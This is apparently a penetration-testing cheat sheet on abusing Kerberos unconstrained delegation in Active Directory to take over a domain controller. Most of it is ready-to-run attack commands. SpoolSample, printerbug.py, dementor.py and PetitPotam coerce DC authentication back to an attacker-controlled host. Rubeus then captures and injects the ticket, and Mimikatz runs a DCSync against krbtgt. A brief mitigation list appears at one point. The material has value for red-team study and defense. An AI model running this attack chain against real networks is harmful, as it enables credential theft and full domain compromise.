Kerberos Delegation - Unconstrained Delegation
The user sends a ST to access the service, along with their TGT, and then the service can use the user's TGT to request a ST for the user to any other service and impersonate the user. - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
When a user authenticates to a computer that has unrestricted kerberos delegation privilege turned on, authenticated user's TGT ticket gets saved to that computer's memory.
Unconstrained delegation used to be the only option available in Windows 2000
Warning Remember to coerce to a HOSTNAME if you want a Kerberos Ticket
SpoolService Abuse with Unconstrained Delegation
The goal is to gain DC Sync privileges using a computer account and the SpoolService bug.
Requirements: - Object with Property Trust this computer for delegation to any service (Kerberos only) - Must have ADS_UF_TRUSTED_FOR_DELEGATION - Must not have ADS_UF_NOT_DELEGATED flag - User must not be in the Protected Users group - User must not have the flag Account is sensitive and cannot be delegated
Find delegation
: Domain controllers usually have unconstrained delegation enabled.
Check the TRUSTED_FOR_DELEGATION property.
- ADModule
-
BloodHound:
MATCH (c:Computer {unconstraineddelegation:true}) RETURN c - Powershell Active Directory module:
Get-ADComputer -LDAPFilter "(&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" -Properties DNSHostName,userAccountControl
SpoolService status
Check if the spool service is running on the remote host
Monitor with Rubeus
Monitor incoming connections from Rubeus.
Force a connect back from the DC
Due to the unconstrained delegation, the TGT of the computer account (DC$) will be saved in the memory of the computer with unconstrained delegation. By default the domain controller computer account has DCSync rights over the domain object.
SpoolSample is a PoC to coerce a Windows host to authenticate to an arbitrary server using a "feature" in the MS-RPRN RPC interface.
# From https://github.com/leechristensen/SpoolSample
.\SpoolSample.exe VICTIM-DC-NAME UNCONSTRAINED-SERVER-DC-NAME
.\SpoolSample.exe DC01.HACKER.LAB HELPDESK.HACKER.LAB
# DC01.HACKER.LAB is the domain controller we want to compromise
# HELPDESK.HACKER.LAB is the machine with delegation enabled that we control.
# From https://github.com/dirkjanm/krbrelayx
printerbug.py 'domain/username:password'@<VICTIM-DC-NAME> <UNCONSTRAINED-SERVER-DC-NAME>
# From https://gist.github.com/3xocyte/cfaf8a34f76569a8251bde65fe69dccc#gistcomment-2773689
python dementor.py -d domain -u username -p password <UNCONSTRAINED-SERVER-DC-NAME> <VICTIM-DC-NAME>
If the attack worked you should get a TGT of the domain controller.
Load the ticket
Extract the base64 TGT from Rubeus output and load it to our current session.
Alternatively you could also grab the ticket using Mimikatz : mimikatz # sekurlsa::tickets
Then you can use DCsync or another attack : mimikatz # lsadump::dcsync /user:HACKER\krbtgt
Mitigation
- Ensure sensitive accounts cannot be delegated
- Disable the Print Spooler Service
MS-EFSRPC Abuse with Unconstrained Delegation
Using PetitPotam, another tool to coerce a callback from the targeted machine, instead of SpoolSample.
# Coerce the callback
git clone https://github.com/topotam/PetitPotam
python3 petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP
python3 petitpotam.py -d '' -u '' -p '' $ATTACKER_IP $TARGET_IP
# Extract the ticket
.\Rubeus.exe asktgs /ticket:<ticket base64> /ptt